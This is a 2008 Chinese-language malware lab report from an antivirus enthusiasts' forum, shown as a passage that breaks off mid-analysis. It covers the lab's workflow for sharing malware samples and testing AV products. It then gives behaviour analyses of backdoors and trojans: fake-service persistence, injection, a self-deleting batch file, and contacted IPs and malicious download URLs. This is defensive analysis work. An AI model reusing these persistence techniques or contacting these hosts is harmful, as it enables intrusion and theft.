doc一. 實驗室概況1. 實驗室人員2. 樣本蒐集與發送流程3. 病毒包測試細則
download 
Report Transcription
一. 實驗室概況1. 實驗室人員2. 樣本蒐集與發送流程3. 病毒包測試細則
一. 實驗室概況
1. 實驗室人員
2. 樣本蒐集與發送流程
3. 病毒包測試細則
4. 分析過的樣本命名規則
5. 運作流程圖
二. 分析報告
1.
Backdoor2008.12.24@001
2.
Backdoor2008.12.24@002
3.
Backdoor2008.12.24@003.zip
4.
Backdoor2008.12.24@003.gz
5.
Backdoor2008.12.24@005
6.
Backdoor2008.12.24@006
7.
Trojan2008.12.24@001
8.
Trojan2008.12.24@002
9.
Trojan2008.12.24@003
10. Trojan2008.12.24@004
11. Trojan2008.12.24@005
12. Trojan2008.12.24@006
13. Trojan2008.12.24@007
14. Trojan2008.12.24@008
15. Trojan2008.12.24@009
16. Virus2008.12.24@001
17. Worm2008.12.24@001
18. Worm2008.12.24@002
19.
Worm2008.12.24@003
三. 防毒軟體測試報告
1. A-Squared Anti-Malware 4.0
2. Avira Antivir Personal
3. 費爾托斯特 V7R3
4. SearchGUI
5. Kaspersky Internet Security 8.0
6. Dr.Web anti-virus
7. Symantec Endpoint Security
8. McAfee VirusScan Plus
9. TrendMicro OfficeScan
10. TrendMicro Internet Securit
11. Kaspersky Anti-Virus
12. 江民防毒 KV2008
13. Panda Internet Security
14. ESET NOD32 Antivirus
15. Norton Internet Security
16. PC Tools Internet Security
17. VBA32 Workerstation 1
18. VBA32 Workerstation 2
19. avast! Antivirus
回到第一頁
實驗室人員
1. 病毒搜集組
integear,kitman231,小韋,mizuhara,tdnj
2.病毒分析組
zha0,asusp4b533,000110,
upside,integear,sylovanas
3.防毒測試組
megakotaro,kitman231,Bug,integear,
戴計,JusticeH,PHT,小韋,小狄~,shisin,
kennyg,ss30102,kingyeh,tdnj,imdino,lmam
w12345k,haol,no.20.fanks
4.公關報告組
JusticeH,ss30102
回到第一頁
樣本蒐集與發送流程
1.樣本請以 EXE 檔為蒐集目標.
2.上傳樣本要以"ZIP"格式壓縮.檔名的格式為:"樣本名(可以不加副檔名)_cv_會員
ID(中文 ID 的對應英文 ID).zip",之後登入"VirusDatas"的"CollectedVirus"後(FTP 登
入方法)便可以上傳.
病毒分析組部分:
1.從"VirusDatas"的"CollectedVirus"下載樣本,並刪除(以免重複分析),之後請上傳
一份原樣本到"VirusBackup"(以便備查).
2.分析完後,請將樣本重新命名後(規則請參照下方),之後再上傳至 FTP 的
"AnalyzedVirus".
3.之後把分析報告傳送至"VirusReports"的"AnalyzerReports",報告格式請一律使
用 TXT 檔,方便快速,報告命名方式為:"分析後的威脅名稱_ar_會員 ID(中文 ID 的對
應英文 ID)".
公關報告組部分:
1.每一個月(暫定)發布前 7 天定期從"VirusReports"的"AnalyzedVirus"下載所有的
樣本並打包成樣本包,其命名格式為:"AVPClubVirusPack_2009.01.01".
2.發布前 3 天便可以開始彙整所有資料,並於最後一天整理成 PDF 檔發布於論壇
上,該報告命名方式為:"ACVL_VirReport_2009.01.01".
防毒測試組部分:
1.從"VirusDatas"的"FinalVirusPack"下載樣本包做測試,並將報告(內容範例請參照
下方)上傳到"VirusReports"的"AntiVirusSoftwaresReports",報告命名方式為:"防毒
軟體名稱_avsr_會員 ID(中文 ID 的對應英文 ID).txt"
2.必須在"AVPClub VirLab 流行威脅研究報告"每個月發布前 3 天把報告上傳完成.
回到第一頁
病毒包測試細則
1. 照著格式儲存成 txt 檔提交報告給第 4 組
防毒軟體:請附上全名(如:AVPClub AntiVirus Plus)
防毒軟體版本:請以防毒廠商之代號(如:Kaspersky 是"8.0.0.506",F-PROT 是"
6.0.9.1",ESET 是"3.0.684")
病毒碼日期:以測試當天為日期(如:2008/01/01)
啟發式設定:高度啟發/中度啟發/基本啟發/預設啟發(預設啟發是指防毒軟體
本身無法更改啟發式程度)
測試環境:作業系統(如:Windows Vista Ultimate SP1 x86)
備註:請自選,沒有請寫"無"
防毒軟體顯示:已偵測:19/已掃描:58
實際檔案數:19(肉眼所見為憑)
移除檔案數:19(肉眼所見為憑)
剩餘檔案數:0(肉眼所見為憑)
未偵測到:0(肉眼所見為憑)
偵測到但只能隔離:0
偵測到但未移除:0
偵測到但無法做出任何動作:0
偵測率:19/19=100.0%
移除率:19/19=100.0%
剩餘檔案名稱:
無
偵測到但未移除檔案名稱:
無
偵測到但只能隔離的檔案名稱:
無
偵測到但無法做出任何動作的檔案名稱:
無
測試人員:會員 ID(如:Bug)
2.在測試組人員收到毒包完成訊息時
必須於 1~3 周內交給第四組報告
3.如果"啟發式"因為設定不同而有不同的結果
請用兩份以上的報告
4.若有事情無法交出報告請是先告知
5.若有其他的設定.請在"其他"那欄填寫
回到第一頁
分析過的樣本命名規則
經過各方建議,在此統一"病毒分析組"上傳樣本的命名規則 .
以趨勢科技的命名規則為基底:
主要行為!次要行為_數字排序(上傳時,請依照"報數原則",如果已經有人先行上傳
001,則後上傳檔名應為 002,不分種類)
以下是大量例子:
TROJ!DownLoader_001_ad_會員 ID(木馬,次要行為是"下載者")
WORM!DownLoader_002_ad_會員 ID(蠕蟲,次要行為是"下載者")
BKDR!AutoRun_003_ad_會員 ID(後門,次要行為是"自動啟動")
VIRS!KillFiles_005_ad_會員 ID(病毒,次要行為是"刪除檔案")
VIRS!Inject_006_ad_會員 ID(病毒,次要行為是"感染檔案")
TSPY!PWStealer_007_ad_會員 ID(間諜程式,次要行為是"密碼竊取者")
TADE!DownLoader_008_ad_會員 ID(廣告程式,次要行為是"下載者")
DIAL!PWStealer_009_ad_會員 ID(撥號程式,次要行為是"密碼竊取者")
TROJ!PWStealer_010_ad_會員 ID(木馬,次要行為是"密碼竊取者")
如有問題,請 PM 在下詢問!
之後公關報告組只需要另外整理成樣本包,並且把後面的"_ad_會員 ID"刪除即可
註:於第二篇報告開始實施
.
回到第一頁
運作流程圖
回到第一頁
1.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-06
可執行 : 是
檔案類型 : EXE ()
上傳者 : 000110
分析者 : 000110
病毒檔案名:Backdoor2008.12.24@001
樣本骨幹圖 :
1.exe
├ services.exe
│ └ liocal.exe
│
└ svchost.exe
└ cmd.exe
1.exe 的行為分析 :
建立檔案 :
C:\WINDOWS\Liocal.exe
C:\Documents and Settings\[User Name]\Local
Settings\Temp\GOLBUB.bat
//生成的檔案名稱為 6 個隨機英文字符
寫入檔案 :
C:\WINDOWS\Liocal.exe
C:\Documents and Settings\[User Name]\Local
Settings\Temp\GOLBUB.bat
建立新的處理程序 :
路徑
程式名稱
啟動參數
c:\windows\system32\
cmd.exe
/c C:\DOCUME~1\[User
Name]\LOCALS~1\Temp\GOLBUB.bat
存取 Service Control Manager :
c:\windows\system32\services.exe
//危險行為, 導致 services.exe 安裝
服務
services.exe 的行為分析 :
建立登錄機碼 :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG
Anti_Spyware Guard
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG
Anti_Spyware Guard\Security
設定登錄資料 :
路徑
名稱
數值
HKEY_LOCAL_MACHINE\SYSTEM\Current
Type
0x00000110(272)
Start
0x00000002(2)
ControlSet\Services\AVG Anti_Spyware
Guard\
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Services\AVG Anti_Spyware
Guard\
//啟動類型為 “自動” , 每次系統啟動時將會執行
HKEY_LOCAL_MACHINE\SYSTEM\Current
ErrorContr
ControlSet\Services\AVG Anti_Spyware
ol
0x00000000(0)
Guard\
HKEY_LOCAL_MACHINE\SYSTEM\Current
ImagePath
C:\WINDOWS\Liocal.exe
HKEY_LOCAL_MACHINE\SYSTEM\Current
DisplayNa
AVG Anti_Spyware Guard
ControlSet\Services\AVG Anti_Spyware
me
ControlSet\Services\AVG Anti_Spyware
Guard\
Guard\
HKEY_LOCAL_MACHINE\SYSTEM\Current
Security
01 00 14 80 90 00 00 00 9c
ControlSet\Services\AVG Anti_Spyware
00 00 00 14 00 00 00 30
Guard\Security\
00 00 00 02 00 1c 00 01 00
00 00 02 80 14 00 ff 01 0f
00 01 01 00 00 00 00 00
01 00 00 00 00 02 00 60
00 04 00 00 00 00 00 14
00 fd 01 02 00 01 01 00 00
00 00 00 05 12 00 00 00
00 00 18 00 ff 01 0f 00 01
02 00 00 00 00 00 05 20
00 00 00 20 02 00 00 00
00 14 00 8d 01 02 00 01
01 00 00 00 00 00 05 0b
00 00 00 00 00 18 00 fd 01
02 00 01 02 00 00 00 00
00 05 20 00 00 00 23 02
00 00 01 01 00 00 00 00
00 05 12 00 00 00 01 01
00 00 00 00 00 05 12 00
00 00
HKEY_LOCAL_MACHINE\SYSTEM\Current
ObjectNa
ControlSet\Services\AVG Anti_Spyware
me
LocalSystem
Guard\
HKEY_LOCAL_MACHINE\SYSTEM\Current
Descriptio
AVG Anti-Virus provides
ControlSet\Services\AVG Anti_Spyware
n
anti-virus services to
Guard\
applications and performs
real-time protection
//以上登錄資料動作將建立一項服務
建立新的處理程序 :
路徑
程式名稱
c:\windows\
liocal.exe
//由於服務已設定為“自動啟動”
liocal.exe 的行為分析 :
建立新的處理程序 :
啟動參數
路徑
程式名稱
啟動參數
C:\WINDOWS\system32\
svchost.exe 73412
存取其它處理程序的記憶體 :
c:\windows\system32\svchost.exe
在其他處理程序中建立執行緒 :
c:\windows\system32\svchost.exe
cmd.exe 的行為分析 :
刪除檔案 :
C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE
C:\Documents and Settings\[User Name]\Local
Settings\Temp\GOLBUB.bat
svchost.exe 的行為分析 :
建立連線 :
TCP - 124.226.42.36:2009
附加資訊 :
其他行為 : 無
GOLBUB.bat 的檔案內容 :
:try
del "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE"
if exist "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE" goto
try
del %0
exit
分析結果 :
病毒類型 : Backdoor
回到第一頁
2.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-03
可執行 : 是
檔案類型 : EXE ()
上傳者 : 000110
分析者 : 000110
病毒檔案名:Backdoor2008.12.24@002
樣本骨幹圖 :
2.exe
└ rundll32.exe
└ services.exe
└ svchost.exe
2.exe 的行為分析 :
建立檔案 :
C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp
寫入檔案 :
C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp
建立新的處理程序 :
路徑
程式名稱
c:\windows\system32\ rundll32.exe
啟動參數
"C:\DOCUME~1\VMware\LOCALS~
1\Temp\4.tmp"
"8A'?________[___[(_______'-6_ _'?窐
'___'IU>#>"
rundll32.exe 的行為分析 :
建立檔案 :
C:\WINDOWS\system32\Local.dll
寫入檔案 :
C:\WINDOWS\system32\Local.dll
建立登錄機碼 :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalServic
e\Parameters
設定登錄資料 :
路徑
名稱
數值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Descri
(HID)的通過輸入訪
Services\LocalService\
ption
問
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Servic
C:\WINDOWS\syste
Services\LocalService\Parameters\
eDll
m32\Local.dll
// “LocalService” 服務的啟動參數
存取 Service Control Manager :
c:\windows\system32\services.exe
//危險行為, 導致 services.exe 安裝
服務
services.exe 的行為分析 :
建立登錄機碼 :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalServic
e
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalServic
e\Security
設定登錄資料 :
路徑
名稱
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr Type
olSet\Services\LocalService\
數值
0x00000110(272)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr Start
0x00000002(2)
olSet\Services\LocalService\
//啟動類型為 “自動” , 每次系統啟動時將會執行
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr ErrorContro 0x00000000(0)
olSet\Services\LocalService\
l
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr ImagePath
C:\WINDOWS\syste
olSet\Services\LocalService\
m32\svchost.exe -k
netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr DisplayNa
intreface Device
olSet\Services\LocalService\
Access
me
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr Security
01 00 14 80 90 00 00
olSet\Services\LocalService\Security\
00 9c 00 00 00 14 00
00 00 30 00 00 00 02
00 1c 00 01 00 00 00
02 80 14 00 ff 01 0f
00 01 01 00 00 00 00
00 01 00 00 00 00 02
00 60 00 04 00 00 00
00 00 14 00 fd 01 02
00 01 01 00 00 00 00
00 05 12 00 00 00 00
00 18 00 ff 01 0f 00
01 02 00 00 00 00 00
05 20 00 00 00 20 02
00 00 00 00 14 00 8d
01 02 00 01 01 00 00
00 00 00 05 0b 00 00
00 00 00 18 00 fd 01
02 00 01 02 00 00 00
00 00 05 20 00 00 00
23 02 00 00 01 01 00
00 00 00 00 05 12 00
00 00 01 01 00 00 00
00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr ObjectNam
olSet\Services\LocalService\
LocalSystem
e
//以上登錄資料動作將建立一項服務
svchost.exe 的行為分析 :
建立連線 :
TCP - 123.147.0.145:8080
附加資訊 :
其他行為 :
1. 由於服務的啟動類型為 “自動”, svchost.exe 已載入 Local.dll
分析結果 :
病毒類型 : Backdoor
回到第一頁
樣本名:AntivirusXP_016_MT3wM.exe
類型:Trojan-Backdoor
病毒檔案名:Backdoor2008.12.24@003.gz
上傳者:kitman231
分析者:asusp4b533
分析日期:20081206
分析工具:ThreatExpert
可執行:是
備註:
會允許外面的電腦連進中毒電腦,造成後門
回到第一頁
LiteVideocodecVer.4.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-05
可執行 : 是
檔案類型 : EXE
上傳者 : integear
分析者 : integear
樣本骨幹圖 :
LiteVideocodecVer.4.exe //母體
└SVCHOST.exe //生成物
LiteVideocodecVer.4.exe 的行為分析 :
建立檔案 :
SVCHOST.exe //生成物
LiteVideocodecVer.4.exe //母體
建立服務:
SVCHOST(狀態:停止)
建立新的處理程序 :
SVCHOST.exe //生成物
LiteVideocodecVer.4.exe //母體
建立登錄檔 :
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST]
Type = 0x00000110
Start = 0x00000002
ErrorControl = 0x00000000
ImagePath = "%Windir%\SVCHOST.exe"
DisplayName = "SVCHOST"
ObjectName = "LocalSystem"
Description = "ϵͳ� � � � "
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Security
]
Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00
00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00
00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02
00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Enum]
0 = "Root\LEGACY_SVCHOST\0000"
Count = 0x00000001
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHO
ST]
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHO
ST\0000]
Service = "SVCHOST"
Legacy = 0x00000001
ConfigFlags = 0x00000000
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
DeviceDesc = "SVCHOST"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHO
ST\0000\Control]
*NewlyCreated* = 0x00000000
ActiveService = "SVCHOST"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST]
Type = 0x00000110
Start = 0x00000002
ErrorControl = 0x00000000
ImagePath = "%Windir%\SVCHOST.exe"
DisplayName = "SVCHOST"
ObjectName = "LocalSystem"
Description = "ϵͳ� � � � "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST\Security]
Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00
00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00
00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02
00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST\Enum]
0 = "Root\LEGACY_SVCHOST\0000"
Count = 0x00000001
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST]
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST\
0000]
Service = "SVCHOST"
Legacy = 0x00000001
ConfigFlags = 0x00000000
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
DeviceDesc = "SVCHOST"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST\
0000\Control]
*NewlyCreated* = 0x00000000
ActiveService = "SVCHOST"
修改登錄檔:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceC
urrent]
(Default) = 0x0000000C
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent]
(Default) = 0x0000000C
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Cache\Paths\path4]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary
Internet Files\Content.IE5\Cache4"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Cache\Paths\path3]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary
Internet Files\Content.IE5\Cache3"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Cache\Paths\path2]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary
Internet Files\Content.IE5\Cache2"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Cache\Paths\path1]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary
Internet Files\Content.IE5\Cache1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Cache\Paths]
Directory = "%Profiles%\LocalService\Local Settings\Temporary
Internet Files\Content.IE5"
下載檔案:
http://zhmlove.dx2.yilehost.cn/ip.txt
分析結果 :
病毒類型 : Backdoor-Hupigon
病毒檔案名:Backdoor2008.12.24@003.zip
回到第一頁
V1.6.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-05
可執行 : 是
檔案類型 : EXE
上傳者 : integear
分析者 : integear
樣本骨幹圖 :
V1.6.exe //母體
V1.6.exe 的行為分析 :
建立檔案 :
V1.6.exe //母體
建立新的處理程序 :
V1.6.exe //母體
修改 Host:
www.jingziwww.cn
下載檔案:
http://www.jingziwww.cn/kabakeytxt/key.txt
http://www.jingziwww.cn/kabakeytxt/keyurl.txt
http://www.jingziwww.cn/kabakeytxt/date.txt
http://www.jingziwww.cn/kabakeytxt/update1.7.txt
分析結果 :
病毒類型 : Backdoor-Hupigon
病毒檔案名:Backdoor2008.12.24@006
回到第一頁
樣本名:A0008739.exe
類型:Trojan-Adware-BHO
病毒檔案名:Trojan2008.12.24@001
上傳者:mizuhara
分析者:asusp4b533
分析日期:20081206
分析工具:ThreatExpert
可執行:是
建立檔案:
* %DesktopDir%\Cheap Pharmacy Online.url
* %DesktopDir%\Search Online.url
* %DesktopDir%\SMS TRAP.url
* %DesktopDir%\VIP Casino.url
* %System%\axvitu.dll
* %System%\c.ico
* %System%\m.ico
* %System%\p.ico
* %System%\s.ico
程序及記憶體行為:
DLL 遠端注入: %System%\axvitu.dll -> IEXPLORE.EXE
登錄檔建立行為:
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\InprocServer32
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\ProgID
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\Programmable
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\TypeLib
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\VersionIndependentProgID
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4
010-BF17-544D1D390117}
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4
010-BF17-544D1D390117}\ProxyStubClsid
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4
010-BF17-544D1D390117}\ProxyStubClsid32
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4
010-BF17-544D1D390117}\TypeLib
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}\ProxyStubClsid
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}\ProxyStubClsid32
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}\TypeLib
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41
A5-A7FA-3B376D69E226}
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41
A5-A7FA-3B376D69E226}\1.0
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41
A5-A7FA-3B376D69E226}\1.0\0
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41
A5-A7FA-3B376D69E226}\1.0\0\win32
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41
A5-A7FA-3B376D69E226}\1.0\FLAGS
*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41
A5-A7FA-3B376D69E226}\1.0\HELPDIR
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID
*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects
*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper
Objects\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}
* HKEY_CURRENT_USER\Software\Microsoft\Bind
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\VersionIndependentProgID]
+ (Default) = "AlsaLi"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\TypeLib]
+ (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\ProgID]
+ (Default) = "AlsaLi.1"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}\InprocServer32]
+ (Default) = "%System%\axvitu.dll"
+ ThreadingModel = "Apartment"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49
DC-94CE-9079F7F75F4E}]
+ (Default) = "Almsms"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-54744010-BF17-544D1D390117}\TypeLib]
+ (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
+ Version = "1.0"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-54744010-BF17-544D1D390117}\ProxyStubClsid32]
+ (Default) = "{00020420-0000-0000-C000-000000000046}"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-
4010-BF17-544D1D390117}\ProxyStubClsid]
+ (Default) = "{00020420-0000-0000-C000-000000000046}"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-54744010-BF17-544D1D390117}]
+ (Default) = "_IbduczwEvents"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}\TypeLib]
+ (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
+ Version = "1.0"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}\ProxyStubClsid32]
+ (Default) = "{00020424-0000-0000-C000-000000000046}"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}\ProxyStubClsid]
+ (Default) = "{00020424-0000-0000-C000-000000000046}"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4
33F-8B51-4C6E85B4605B}]
+ (Default) = "Ibduczw"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4
1A5-A7FA-3B376D69E226}\1.0\0\win32]
+ (Default) = "%System%\axvitu.dll"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4
1A5-A7FA-3B376D69E226}\1.0\HELPDIR]
+ (Default) = "%System%\"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4
1A5-A7FA-3B376D69E226}\1.0\FLAGS]
+ (Default) = "0"
o
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4
1A5-A7FA-3B376D69E226}\1.0]
+ (Default) = "ssxzzw Library"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer]
+ (Default) = "AlsaLi.1"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID]
+ (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi]
+ (Default) = "Almsms"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID]
+ (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1]
+ (Default) = "Almsms"
o [HKEY_CURRENT_USER\Software\Microsoft\Bind]
+ comment2 = "5xxx3913705"
備註:
建立連外連線: lookfornewsoftware.com
下載網頁: http://lookfornewsoftware.com/cfg1.php
http://lookfornewsoftware.com/cfg2.php
回到第一頁
cao.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-05
可執行 : 是
檔案類型 : EXE (Packed With UPack)
上傳者 : kitman231
分析者 : 000110
樣本骨幹圖 :
cao.exe
├ rundll32.exe
│ └ cmd.exe
│
└ zsmscc071001.exe
│
└ iexplore.exe
└ cmd.exe (第 2 次執行)
cao.exe 的行為分析 :
建立檔案 :
C:\WINDOWS\system32\zsmscc071001.exe
C:\WINDOWS\zsmscc16.ini
C:\WINDOWS\system32\zsmscc071001.dll
c:\nmDelm.bat
寫入檔案 :
C:\WINDOWS\system32\zsmscc071001.exe
C:\WINDOWS\zsmscc16.ini
C:\WINDOWS\system32\zsmscc071001.dll
C:\nmDelm.bat
建立登錄機碼 :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Expl
orer\run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ex
plorer
設定登錄資料 :
路徑
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
名稱
zsmscc
數值
rundll32.exe
\Windows\CurrentVersion\policies\Explorer\r
un\
//系統啟動時將自動執行指定的程式
建立新的處理程序 :
路徑
程式名稱
c:\windows\system32 rundll32.exe
\
c:\windows\system32 cmd.exe
\
//第 2 次 cmd.exe 執行
C:\WINDOWS\system32\zsmscc
071001.dll mymain
啟動參數
C:\WINDOWS\system32\zsmscc071001.dll mymain
/c c:\nmDelm.bat
rundll32.exe 的行為分析 :
建立檔案 :
c:\downf.bat
寫入檔案 :
C:\downf.bat
建立新的處理程序 :
路徑
